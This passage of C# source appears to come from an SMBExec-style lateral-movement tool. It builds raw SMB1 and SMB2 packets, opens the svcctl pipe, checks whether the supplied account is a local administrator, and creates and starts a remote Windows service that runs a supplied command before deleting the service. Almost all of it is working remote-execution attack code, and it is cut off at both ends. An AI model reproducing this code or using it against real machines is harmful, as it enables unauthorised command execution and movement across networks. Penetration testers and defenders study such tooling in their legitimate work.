Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x05, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
}
break;
case "CloseRequest":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x04 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBCloseRequest(new byte[] { 0x00, 0x40 });
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "TreeDisconnect";
}
break;
case "TreeDisconnect":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x71 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBTreeDisconnectRequest();
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "Logoff";
}
break;
case "Logoff":
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x74 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0x34, 0xfe }, Process_ID_Bytes, SMB_User_ID);
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
SMB_Signing_Counter += 2;
SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
}
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
Packet_SMB_Data = SMBExec.SMBLogoffAndXRequest();
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
if (SMB_Signing)
{
SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "exit";
}
break;
}
}
}
else
{
SMBClientStage = "TreeConnect";
HMACSHA256 HMAC_SHA256 = new HMACSHA256();
while (SMBClientStage != "exit" && SMBExec_Failed == false)
{
if (debug) { output.AppendLine(String.Format("Current Stage {0}", SMBClientStage)); }
switch (SMBClientStage)
{
case "TreeConnect":
{
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x03, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2TreeConnectRequest(SMB_Path_Bytes);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "CreateRequest";
}
break;
case "CreateRequest":
{
SMB2_Tree_ID = new byte[] { 0x01, 0x00, 0x00, 0x00 };
SMB_Named_Pipe_Bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x05, 0x0 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2CreateRequestFile(SMB_Named_Pipe_Bytes);
Packet_SMB2_Data["SMB2CreateRequestFIle_Share_Access"] = new byte[] { 0x07, 0x00, 0x00, 0x00 };
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "RPCBind";
}
break;
case "RPCBind":
{
SMB_Named_Pipe_Bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
SMB2_Message_ID++;
SMB_File_ID = Utilities.GetByteRange(SMBClientReceive, 132, 147);
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_RPC_Data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x0, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "OpenSCManagerW";
}
break;
case "ReadRequest":
{
Thread.Sleep(sleep * 1000);
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x08, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
Packet_SMB2_Header["SMB2Header_CreditCharge"] = new byte[] { 0x10, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2ReadRequest(SMB_File_ID);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
{
SMBClientStage = SMB_Client_Stage_Next;
}
else
{
SMBClientStage = "StatusPending";
}
}
break;
case "StatusPending":
{
SMBClientStream.Read(SMBClientReceive, 0, SMBClientReceive.Length);
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
{
SMBClientStage = SMB_Client_Stage_Next;
}
}
break;
case "OpenSCManagerW":
{
SMB2_Message_ID = 30;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_Bytes, SMB_Service_Length);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "CheckAccess";
}
break;
case "CheckAccess":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 127)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
{
SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 108, 127);
if (SMB_execute)
{
Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
if (SCM_Data.Length < SMB_Split_Index)
{
SMBClientStage = "CreateServiceW";
}
else
{
SMBClientStage = "CreateServiceW_First";
}
}
else
{
output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target));
SMB2_Message_ID += 20;
SMB_Close_Service_Handle_Stage = 2;
SMBClientStage = "CloseServiceHandle";
}
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "05-00-00-00")
{
output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", Output_Username, Target));
SMBExec_Failed = true;
}
else
{
output.AppendLine(String.Format("Something went wrong with {0}", Target));
SMBExec_Failed = true;
}
}
break;
case "CreateServiceW":
{
if (SMBExec_Command.Length < SMB_Split_Index)
{
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "StartServiceW";
}
}
break;
case "CreateServiceW_First":
{
SMB_Split_Stage_final = Math.Ceiling((double)SCM_Data.Length / SMB_Split_Index);
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
byte[] SCM_Data_First = Utilities.GetByteRange(SCM_Data, 0, SMB_Split_Index - 1);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_First);
Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length);
SMB_Split_Index_Tracker = SMB_Split_Index;
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (SMB_Split_Stage_final <= 2)
{
SMBClientStage = "CreateServiceW_Last";
}
else
{
SMB_Split_Stage = 2;
SMBClientStage = "CreateServiceW_Middle";
}
}
break;
case "CreateServiceW_Middle":
{
SMB_Split_Stage++;
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
byte[] SCM_Data_Middle = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SMB_Split_Index_Tracker + SMB_Split_Index - 1);
SMB_Split_Index_Tracker += SMB_Split_Index;
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Middle);
Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length - SMB_Split_Index_Tracker + SMB_Split_Index);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (SMB_Split_Stage >= SMB_Split_Stage_final)
{
SMBClientStage = "CreateServiceW_Last";
}
else
{
SMBClientStage = "CreateServiceW_Middle";
}
}
break;
case "CreateServiceW_Last":
{
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
byte[] SCM_Data_Last = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SCM_Data.Length);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Last);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "StartServiceW";
}
break;
case "StartServiceW":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "00-00-00-00")
{
if (debug) { output.AppendLine(String.Format("Service {0} created on {1}", SMB_Service, Target)); }
SMB_Service_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 112, 131);
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SCM_Data = SMBExec.SCMStartServiceW(SMB_Service_Context_Handle);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "DeleteServiceW";
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "31-04-00-00")
{
if (debug) { output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_Service, Target)); }
SMBExec_Failed = true;
}
else
{
if (debug) { output.AppendLine("Service Creation Fault Context Mismatch."); }
SMBExec_Failed = true;
}
}
break;
case "DeleteServiceW":
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "1d-04-00-00")
{
output.AppendLine(String.Format("Command executed with service {0} on {1}", SMB_Service, Target));
}
else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "02-00-00-00")
{
output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_Service, Target));
}
SMB2_Message_ID += 20;
